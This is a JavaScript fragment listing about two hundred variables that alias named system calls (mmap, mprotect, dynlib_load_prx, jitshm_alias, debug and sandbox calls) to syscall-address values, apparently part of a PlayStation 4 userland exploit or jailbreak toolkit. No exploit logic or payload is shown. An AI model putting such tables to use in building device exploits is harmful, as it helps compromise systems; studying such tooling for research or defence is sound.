var sigaction_addr = sys_416_addr;
var ipmimgr_call_addr = sys_622_addr;
var aio_submit_cmd_addr = sys_669_addr;
var free_stack_addr = sys_620_addr;
var settimeofday_addr = sys_122_addr;
var recvmsg_addr = sys_27_addr;
var aio_submit_addr = sys_661_addr;
var setgroups_addr = sys_80_addr;
var aio_multi_cancel_addr = sys_666_addr;
var nanosleep_addr = sys_240_addr;
var blockpool_map_addr = sys_654_addr;
var thr_create_addr = sys_430_addr;
var munlockall_addr = sys_325_addr;
var dynlib_get_info_ex_addr = sys_608_addr;
var pwritev_addr = sys_290_addr;
var mname_addr = sys_588_addr;
var regmgr_call_addr = sys_532_addr;
var getgroups_addr = sys_79_addr;
var osem_close_addr = sys_552_addr;
var osem_delete_addr = sys_550_addr;
var dynlib_get_obj_member_addr = sys_649_addr;
var debug_init_addr = sys_560_addr;
var mmap_dmem_addr = sys_628_addr;
var kldunloadf_addr = sys_444_addr;
var mprotect_addr = sys_74_addr;
var ksem_trywait_addr = sys_403_addr;
var ksem_close_addr = sys_400_addr;
var sched_rr_get_interval_addr = sys_334_addr;
var getitimer_addr = sys_86_addr;
var getpid_addr = sys_20_addr;
var netgetsockinfo_addr = sys_102_addr;
var get_cpu_usage_all_addr = sys_627_addr;
var eport_delete_addr = sys_581_addr;
var randomized_path_addr = sys_602_addr;
var jitshm_alias_addr = sys_534_addr;
var seteuid_addr = sys_183_addr;
var set_uevt_addr = sys_640_addr;
var clock_getres_addr = sys_234_addr;
var setitimer_addr = sys_83_addr;
var thr_exit_addr = sys_431_addr;
var sandbox_path_addr = sys_600_addr;
var thr_kill_addr = sys_433_addr;
var sys_exit_addr = sys_1_addr;
var dup2_addr = sys_90_addr;
var utimes_addr = sys_138_addr;
var pread_addr = sys_475_addr;
var dl_get_info_addr = sys_536_addr;
var ktimer_settime_addr = sys_237_addr;
var sched_setparam_addr = sys_327_addr;
var aio_create_addr = sys_668_addr;
var osem_wait_addr = sys_553_addr;
var dynlib_get_list_for_libdbg_addr = sys_672_addr;
var get_proc_type_info_addr = sys_612_addr;
var getgid_addr = sys_47_addr;
var fstat_addr = sys_189_addr;
var fork_addr = sys_2_addr;
var namedobj_create_addr = sys_557_addr;
var opmc_set_ctl_addr = sys_565_addr;
var get_resident_count_addr = sys_613_addr;
var getdirentries_addr = sys_196_addr;
var getrusage_addr = sys_117_addr;
var setreuid_addr = sys_126_addr;
var wait4_addr = sys_7_addr;
var __sysctl_addr = sys_202_addr;
var bind_addr = sys_104_addr;
var sched_yield_addr = sys_331_addr;
var dl_get_metadata_addr = sys_604_addr;
var get_resident_fmem_count_addr = sys_615_addr;
var setsockopt_addr = sys_105_addr;
var dynlib_load_prx_addr = sys_594_addr;
var getpriority_addr = sys_100_addr;
var get_phys_page_size_addr = sys_677_addr;
var opmc_set_hw_addr = sys_625_addr;
var dynlib_do_copy_relocations_addr = sys_596_addr;
var netcontrol_addr = sys_99_addr;
var ksem_post_addr = sys_401_addr;
var netgetiflist_addr = sys_125_addr;
var chmod_addr = sys_15_addr;
var aio_suspend_addr = sys_315_addr;
var ksem_timedwait_addr = sys_441_addr;
var dynlib_dlsym_addr = sys_591_addr;
var get_paging_stats_of_all_objects_addr = sys_618_addr;
var osem_cancel_addr = sys_556_addr;
var writev_addr = sys_121_addr;
var ktimer_getoverrun_addr = sys_239_addr;
var rmdir_addr = sys_137_addr;
var sched_get_priority_min_addr = sys_333_addr;
var dynlib_unload_prx_addr = sys_595_addr;
var thr_set_name_addr = sys_464_addr;
var mlockall_addr = sys_324_addr;
var openat_addr = sys_499_addr;
var eport_open_addr = sys_583_addr;
var sigprocmask_addr = sys_340_addr;
var chdir_addr = sys_12_addr;
var physhm_unlink_addr = sys_630_addr;
var mtypeprotect_addr = sys_379_addr;
var thr_wake_addr = sys_443_addr;
var blockpool_open_addr = sys_653_addr;
var thr_new_addr = sys_455_addr;
var munlock_addr = sys_204_addr;
var fchflags_addr = sys_35_addr;
var ftruncate_addr = sys_480_addr;
var rename_addr = sys_128_addr;
var poll_addr = sys_209_addr;
var eport_trigger_addr = sys_582_addr;
var getsid_addr = sys_310_addr;
var virtual_query_addr = sys_572_addr;
var fchmod_addr = sys_124_addr;
var _umtx_unlock_addr = sys_435_addr;
var mmap_addr = sys_477_addr;
var ktimer_create_addr = sys_235_addr;
var dup_addr = sys_41_addr;
var sendmsg_addr = sys_28_addr;
var close_addr = sys_6_addr;
var is_development_mode_addr = sys_606_addr;
var getegid_addr = sys_43_addr;
var get_vm_map_timestamp_addr = sys_624_addr;
var dynlib_get_proc_param_addr = sys_598_addr;
var fcntl_addr = sys_92_addr;
var getppid_addr = sys_39_addr;
var readv_addr = sys_120_addr;
var rdup_addr = sys_603_addr;
var listen_addr = sys_106_addr;
var app_state_change_addr = sys_648_addr;
var set_gpo_addr = sys_617_addr;
var ksem_unlink_addr = sys_406_addr;
var get_cpu_usage_proc_addr = sys_641_addr;
var shm_unlink_addr = sys_483_addr;
var reserve_2mb_page_addr = sys_675_addr;
var dynlib_get_info2_addr = sys_660_addr;
var mlock_addr = sys_203_addr;
var workaround8849_addr = sys_605_addr;
var get_sdk_compiled_version_addr = sys_647_addr;
var clock_settime_addr = sys_233_addr;
var ksem_destroy_addr = sys_408_addr;
var ksem_open_addr = sys_405_addr;
var thr_set_ucontext_addr = sys_635_addr;
var get_bio_usage_all_addr = sys_667_addr;
var getdtablesize_addr = sys_89_addr;
var chflags_addr = sys_34_addr;
var shm_open_addr = sys_482_addr;
var eport_close_addr = sys_584_addr;
var dynlib_get_list2_addr = sys_659_addr;
var socketclose_addr = sys_114_addr;
var sched_getscheduler_addr = sys_330_addr;
var pathconf_addr = sys_191_addr;
var localtime_to_utc_addr = sys_639_addr;
var setpriority_addr = sys_96_addr;
var cpumode_yield_addr = sys_676_addr;
var process_terminate_addr = sys_652_addr;
var ioctl_addr = sys_54_addr;
var opmc_get_hw_addr = sys_626_addr;
var eport_create_addr = sys_580_addr;
var socket_addr = sys_97_addr;
var _umtx_lock_addr = sys_434_addr;
var thr_suspend_addr = sys_442_addr;
var is_in_sandbox_addr = sys_585_addr;
var get_authinfo_addr = sys_587_addr;
var mdbg_service_addr = sys_601_addr;
var getsockopt_addr = sys_118_addr;
var get_paging_stats_of_all_threads_addr = sys_611_addr;
var adjtime_addr = sys_140_addr;
var kqueueex_addr = sys_141_addr;
var uuidgen_addr = sys_392_addr;
var set_vm_container_addr = sys_559_addr;
var sendto_addr = sys_133_addr;